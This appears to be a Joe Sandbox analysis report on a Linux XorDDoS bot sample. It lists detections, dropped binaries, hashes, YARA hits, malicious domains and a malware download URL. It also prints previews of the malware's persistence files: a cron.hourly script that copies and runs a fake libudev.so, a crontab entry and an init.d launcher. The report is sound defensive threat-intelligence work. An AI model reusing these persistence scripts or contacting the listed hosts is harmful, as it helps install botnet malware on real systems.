This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TmoTjBkSXT.elf	66%	ReversingLabs	Linux.Network.XorDDoS
TmoTjBkSXT.elf	42%	Virustotal		Browse
TmoTjBkSXT.elf	100%	Avira	LINUX/Xorddos.cona
TmoTjBkSXT.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/lib/libudev.so	100%	Avira	LINUX/Xorddos.cona
/usr/bin/xilfqxoepi	100%	Avira	LINUX/Xorddos.cona
/usr/bin/flfoijfhrh	100%	Avira	LINUX/Xorddos.cona
/usr/bin/zygafieftp	100%	Avira	LINUX/Xorddos.cona
/usr/bin/rfjhcudkoa	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wrvgghkqdd	100%	Avira	LINUX/Xorddos.cona
/usr/bin/vwtoogupfm	100%	Avira	LINUX/Xorddos.cona
/usr/bin/eygutfitxp	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ljhaidbadz	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ogbruyreel	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ybavzvdbws	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ucawyxmhdv	100%	Avira	LINUX/Xorddos.cona
/usr/bin/mqnheeruxi	100%	Avira	LINUX/Xorddos.cona
/usr/bin/zuuufkngmy	100%	Avira	LINUX/Xorddos.cona
/usr/bin/pmvkvnihjm	100%	Avira	LINUX/Xorddos.cona
/usr/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/xilfqxoepi	100%	Joe Sandbox ML
/usr/bin/flfoijfhrh	100%	Joe Sandbox ML
/usr/bin/zygafieftp	100%	Joe Sandbox ML
/usr/bin/rfjhcudkoa	100%	Joe Sandbox ML
/usr/bin/wrvgghkqdd	100%	Joe Sandbox ML
/usr/bin/vwtoogupfm	100%	Joe Sandbox ML
/usr/bin/eygutfitxp	100%	Joe Sandbox ML
/usr/bin/ljhaidbadz	100%	Joe Sandbox ML
/usr/bin/ogbruyreel	100%	Joe Sandbox ML
/usr/bin/ybavzvdbws	100%	Joe Sandbox ML
/usr/bin/ucawyxmhdv	100%	Joe Sandbox ML
/usr/bin/mqnheeruxi	100%	Joe Sandbox ML
/usr/bin/piqqogcjxo	100%	Joe Sandbox ML
/usr/bin/zuuufkngmy	100%	Joe Sandbox ML
/usr/bin/pmvkvnihjm	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	42%	ReversingLabs	Linux.Network.Xor
/etc/cron.hourly/gcc.sh	41%	Virustotal		Browse
/usr/lib/libudev.so	66%	ReversingLabs	Linux.Network.XorDDoS
/usr/lib/libudev.so	42%	Virustotal		Browse

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ww.wowapplecar.com/config.rar	100%	Avira URL Cloud	malware
dd.nnmm234.com:1430	0%	Avira URL Cloud	safe
http://ww.wowapplecar.com/config.rar30	100%	Avira URL Cloud	malware
dd.vvbb321.com:1430	0%	Avira URL Cloud	safe
dd.jjkk567.com:1430	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dd.xxcc789.com	137.175.88.241	true	true	unknown
ww.wowapplecar.com	unknown	unknown	true	unknown
dd.jjkk567.com	unknown	unknown	true	unknown
dd.vvbb321.com	unknown	unknown	true	unknown
dd.nnmm234.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ww.wowapplecar.com/config.rar30	true	Avira URL Cloud: malware	unknown
dd.nnmm234.com:1430	true	Avira URL Cloud: safe	unknown
dd.vvbb321.com:1430	true	Avira URL Cloud: safe	unknown
dd.jjkk567.com:1430	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.gnu.org/software/libc/bugs.html	TmoTjBkSXT.elf, libudev.so.13.dr, xilfqxoepi.13.dr, flfoijfhrh.13.dr, zygafieftp.13.dr, rfjhcudkoa.13.dr, wrvgghkqdd.13.dr, vwtoogupfm.13.dr, eygutfitxp.13.dr, ljhaidbadz.13.dr, ogbruyreel.13.dr, ybavzvdbws.13.dr, ucawyxmhdv.13.dr, mqnheeruxi.13.dr, zuuufkngmy.13.dr, pmvkvnihjm.13.dr	false		high
http://ww.wowapplecar.com/config.rar30	TmoTjBkSXT.elf, 6220.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6222.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6223.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6224.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6253.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6256.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6258.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6261.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6264.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6271.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6274.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6276.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6279.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6281.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6288.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6291.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6293.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6296.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6299.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6325.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6328.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://ww.wowapplecar.com/config.rar	TmoTjBkSXT.elf, 6220.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6222.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6223.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6224.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6253.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6256.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6258.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6261.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6264.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6271.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6274.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6276.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6279.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6281.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6288.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6291.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6293.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6296.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6299.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6325.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6328.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
137.175.88.241	dd.xxcc789.com	United States	54600	PEGTECHINCUS	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
109.202.202.202	Xyl3DnRyQP.elf	Get hash	malicious	Mirai	Browse
	0FsVELdYxY.elf	Get hash	malicious	Mirai	Browse
	xX2te0Hn5o.elf	Get hash	malicious	Mirai	Browse
	XIbeqhmmQI.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	XmztmwSit3.elf	Get hash	malicious	Unknown	Browse
	D2sLkFb0Il.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	ehDbsf5C6M.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	arm5.elf	Get hash	malicious	Mirai	Browse
	SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elf	Get hash	malicious	Unknown	Browse
91.189.91.43	Xyl3DnRyQP.elf	Get hash	malicious	Mirai	Browse
	0FsVELdYxY.elf	Get hash	malicious	Mirai	Browse
	xX2te0Hn5o.elf	Get hash	malicious	Mirai	Browse
	XIbeqhmmQI.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	XmztmwSit3.elf	Get hash	malicious	Unknown	Browse
	D2sLkFb0Il.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	ehDbsf5C6M.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	arm5.elf	Get hash	malicious	Mirai	Browse
	SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	Xyl3DnRyQP.elf	Get hash	malicious	Mirai	Browse
	0FsVELdYxY.elf	Get hash	malicious	Mirai	Browse
	xX2te0Hn5o.elf	Get hash	malicious	Mirai	Browse
	XIbeqhmmQI.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	XmztmwSit3.elf	Get hash	malicious	Unknown	Browse
	D2sLkFb0Il.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	ehDbsf5C6M.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	arm5.elf	Get hash	malicious	Mirai	Browse
	SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	Xyl3DnRyQP.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	0FsVELdYxY.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	vKJEMWrTHL.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	qQ6lZJdx7E.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	xX2te0Hn5o.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	XIbeqhmmQI.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	XmztmwSit3.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	D2sLkFb0Il.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	ehDbsf5C6M.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
CANONICAL-ASGB	Xyl3DnRyQP.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	0FsVELdYxY.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	vKJEMWrTHL.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	qQ6lZJdx7E.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	xX2te0Hn5o.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	XIbeqhmmQI.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	XmztmwSit3.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	D2sLkFb0Il.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	ehDbsf5C6M.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
PEGTECHINCUS	inpau292101.js	Get hash	malicious	FormBook	Browse	108.186.14.193
	9wDlG5DeRK.elf	Get hash	malicious	Moobot	Browse	107.149.219.19
	myt7Asbdtb.elf	Get hash	malicious	Mirai	Browse	154.88.173.218
	8IEzyBx17X.elf	Get hash	malicious	Mirai	Browse	156.243.156.252
	eMd5sYwF0x.elf	Get hash	malicious	Mirai	Browse	156.231.123.195
	PO-31789R3WY-10_docx.exe	Get hash	malicious	FormBook	Browse	192.74.233.8
	nOP8vkpsYK.elf	Get hash	malicious	Unknown	Browse	163.197.255.143
	CxshSjQuo4.elf	Get hash	malicious	Mirai	Browse	156.247.76.139
	X4hQbUq5Ib.elf	Get hash	malicious	Mirai	Browse	199.33.215.82
	PI for #13288.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	156.238.45.183
INIT7CH	Xyl3DnRyQP.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	0FsVELdYxY.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	xX2te0Hn5o.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	XIbeqhmmQI.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	XmztmwSit3.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	D2sLkFb0Il.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	ehDbsf5C6M.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	213.144.142.24
	arm5.elf	Get hash	malicious	Mirai	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/cron.hourly/gcc.sh	dptxrnhxmx.elf	Get hash	malicious	XorDDoS	Browse
	1.elf	Get hash	malicious	XorDDoS	Browse
	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse
	fuck.elf	Get hash	malicious	XorDDoS	Browse
	dkuidbsedp	Get hash	malicious	XorDDoS	Browse
	libudev.so	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	xor1.o	Get hash	malicious	XorDDoS	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42% Antivirus: Virustotal, Detection: 41%, Browse
Joe Sandbox View:	Filename: dptxrnhxmx.elf, Detection: malicious, Browse Filename: 1.elf, Detection: malicious, Browse Filename: iJl2Sb6qRa, Detection: malicious, Browse Filename: Di1p3oLnDb.elf, Detection: malicious, Browse Filename: fuck.elf, Detection: malicious, Browse Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: xor1.o, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Download File

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/TmoTjBkSXT.elf

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.30987922597172
Encrypted:	false
SSDEEP:	6:hUtoFdU9dHLsKheJOHjBE21YJvmNeMwhKxxH11DzRIM5ta6MzZ5tq4:6zH6OHjBEMO1KbHXzuIszLL
MD5:	49835BF2D154DF04A7DBB95A9B662287
SHA1:	D473263F0543FD83D8EF7455730A21729E61B52D
SHA-256:	E90DC13122B8D837FA0DED4F99EB51DA00B051DD68A25550283F1BE358F4EFB2
SHA-512:	9C4032DE1E8C84C67FBB24CECD1E3AF9BCCC9FDE37CF7DF05806007926A0F2F45C4FBBCC136588318DFEF3A735C99078F5FECFC3E6C0F915165040B727D51233
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: TmoTjBkSXT.elf.### BEGIN INIT INFO.# Provides:..TmoTjBkSXT.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.TmoTjBkSXT.elf.### END INIT INFO.case $1 in.start)../tmp/TmoTjBkSXT.elf..;;.stop)..;;.*)../tmp/TmoTjBkSXT.elf..;;.esac.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.8133072359050906
Encrypted:	false
SSDEEP:	3:CQmHZSRvi9X:C7HZiviJ
MD5:	1D60529247039896CDE9880FC5A12DF0
SHA1:	A16D7805D36E07D9C4C8EF948D1268B269EDB2DC
SHA-256:	50F02F109B0A71CA0CDAA5A18A0CB63D7676039A089FDE56BB94D6126DE49361
SHA-512:	B731F232C00E6F02961B89D68C827EFB85EA3B5EE6F30ABB5DF1019266E50EB252106D3FDAAF0E2D3D1FE33390C6275608E884CB8AB0D86F189CDB498AD6A9E4
Malicious:	false
Reputation:	low
Preview:	fbpaucfvzjbaiwwnoatvvvwtwyyvwkce

/usr/bin/eygutfitxp

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.18304960824505
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3x:VB2WCH/eMU9Uc8gd49N94BJXQLL4rux
MD5:	C5560A18CB6F7C944AAFD759DBDC1F8E
SHA1:	D639D1C6614CE14095837298CA01B79870D1D45E
SHA-256:	45BC9758742E1E491AA71BEC5D3E62C075FC7B2A87662BEE2C845B484B783B7E
SHA-512:	E99D39DF60FA9EFA1BF56C5F126F2234DB72F16873D7E043BBD45D85DADD3D4C34471D3DD577B6B85D54123CEAACE171DC03FA074D87F35B85BE0A56CC7B7A9E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eygutfitxp, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eygutfitxp, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/eygutfitxp, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eygutfitxp, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/eygutfitxp, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/eygutfitxp, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eygutfitxp, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/flfoijfhrh

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183059945561362
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3Z:VB2WCH/eMU9Uc8gd49N94BJXQLL4ruZ
MD5:	FD2E647D032EA2F380C1715F0DDB4582
SHA1:	E2A0E5C4B0F72CD98228D7BA1F198AD297C3D3B3
SHA-256:	64919E8521ED31B55F1F4E59BFF8D5F52AFE04C7317199439273336D54FBE9A1
SHA-512:	EF92C2438A65ABD7A512FF6E1BAE53EF371D85CF4A92F2604196D2A3A995E82C202A6689DCFBC41A22D55564D33593AE7C81EC876E2DA57F43062D7273A26B93
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/flfoijfhrh, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/flfoijfhrh, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/flfoijfhrh, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/flfoijfhrh, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/flfoijfhrh, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/flfoijfhrh, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/flfoijfhrh, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ljhaidbadz

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183058344749353
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3o:VB2WCH/eMU9Uc8gd49N94BJXQLL4ruo
MD5:	CCDD3C4A20B8CA7A95AC155639EF8C22
SHA1:	CC75CCF9F9C71E3EFF49C68632604301F93F39CF
SHA-256:	E3A64F628E9FE58254B610F7EC511ED591A2D9160977536A0D8B99169E06CFED
SHA-512:	0EC1EE69F1666848BB58171243BD7BE438116289299B78BFBAB3AC9E0223B73F5B3147D4FAE5895B287D9C9F91A244E03C558054D741BEF292801776967E4ADE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ljhaidbadz, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ljhaidbadz, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ljhaidbadz, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ljhaidbadz, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ljhaidbadz, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ljhaidbadz, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ljhaidbadz, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/mqnheeruxi

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.1830583982769385
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3F:VB2WCH/eMU9Uc8gd49N94BJXQLL4ruF
MD5:	D819564CAD3BA79779BFC8B9E3BBD10A
SHA1:	6E4239FE8BFB442DD579F68E498A17704BCFDADC
SHA-256:	BCC6E609A090D4E79AC28805E66347EF4A04A0907D7665F15D35A719A27B4096
SHA-512:	633480ABED70A2CA68AC4F403A3AE444F895D32B22062B73FD8E42A7C802361744545DD964FE2106F6CF2A87C97E4577C5DF4573E4933EF594D1C6BD94737F08
Malicious:	true
